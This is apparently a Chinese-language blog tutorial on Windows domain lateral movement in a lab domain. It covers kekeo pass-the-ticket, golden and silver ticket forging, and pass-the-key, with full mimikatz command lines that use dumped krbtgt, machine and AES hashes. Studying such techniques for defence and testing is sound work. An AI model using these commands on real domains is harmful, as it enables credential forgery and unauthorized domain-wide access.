内网环境下的横向移动——利用kekeo ptt

这里使用到不用管理员权限进行ptt,使用到kekeo

1.生成票据

内网环境下的横向移动——利用kekeo ptt_第1张图片

2.导入票据

内网环境下的横向移动——利用kekeo ptt_第2张图片

3.查看票据并访问域控

内网环境下的横向移动——利用kekeo ptt_第3张图片

Golden ticket

Golden ticket的作用是可以生成任意用户的tgt,那么问题就来了,是什么条件能够让他生成任意用户的tgt呢?还得要看kerberos认证的过程,在windows认证过程中,客户端将自己的信息发送给KDC,然后KDC使用krbtgt用户密码的hash作为密钥进行加密,生成TGT。

那么如果获取到了krbtgt的密码hash值,就可以伪造任意tgt了。因为krbtgt只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门

伪造黄金凭据需要具备下面条件:

  • krbtgt用户的hash(就意味着你已经有域控制器权限了)

  • 域名称

  • 域的SID值

  • 要伪造的用户名

先登录域控制器,dump krbtgt用户的hash值,获取域sid

内网环境下的横向移动——利用kekeo ptt_第4张图片

内网环境下的横向移动——利用kekeo ptt_第5张图片

登录普通域用户生成TGT凭证

kerberos::golden /user:administrator /domain:Drunkmars.com /sid:S-1-5-21-652679085-3170934373-4288938398-1107 /krbtgt:c1833c0783cfd81d3548dd89b017c99a /ticket:gold.kirbi

内网环境下的横向移动——利用kekeo ptt_第6张图片

注入黄金票据并访问域控

内网环境下的横向移动——利用kekeo ptt_第7张图片

如果开启rpc服务则可以用winexec.vbs直接连接,这里我的域控没有开启rpc服务,所以这里连接没有成功

内网环境下的横向移动——利用kekeo ptt_第8张图片

Sliver ticket

Sliver ticketgolden ticket不同的是,它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限。

不像是Golden ticket,是由krgtgt用户的密码hash进行加密,伪造tgt可以获取到所有权限。

白银票据这里只是对单一的服务进行授权,利用过程和golden ticket差不多,首先上域控制器中,把机器的ntlm hash(rc4加密) dump下来,然后在普通域用户机器进行伪造权限,进行ptt。

登录DC,抓取ntlm hash

内网环境下的横向移动——利用kekeo ptt_第9张图片

在普通域用户中生成票据

kerberos::golden /domain:Drunkmars.com /sid:S-1-5-21-652679085-3170934373-4288938398 /target:WIN-M836NN6NU8B.Drunkmars.com /service:cifs /rc4:7c64e7ebf46b9515c56b2dd522d21c1c /user:administrator /ptt

内网环境下的横向移动——利用kekeo ptt_第10张图片

查看票证访问域控内网环境下的横向移动——利用kekeo ptt_第11张图片

PTK(pass the key)

在连接配置的时候允许使用hash进行认证,而不是只有账号密码才能认证。

就是由于在进行认证的时候,是用用户hash加密时间戳,即使在使用密码进行登录的情况下,也是先把密码加密成hash,再进行认证。因此在只有用户hash,没有明文密码的情况下也是可以进行认证的。不管是rubeus还是impacket里面的相关脚本都是支持直接使用hash进行认证。其中,如果hash的ntlm hash,然后加密方式是rc4,这种就算做是pass the hash,如果是hash是aes key(使用sekurlsa::ekeys导出来),就算是pass the key。在很多地方,不支持rc4加密方式的时候,使用pass the key不失为一种好方法。

获取aes key

内网环境下的横向移动——利用kekeo ptt_第12张图片

注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:mars2 /domain:Drunkmars.com /aes256:a207497d6c9df363b6658271ac0df1862c395d6b32003a5207dde3803f7dae0d" 

内网环境下的横向移动——利用kekeo ptt_第13张图片

你可能感兴趣的:(网络,安全,学习)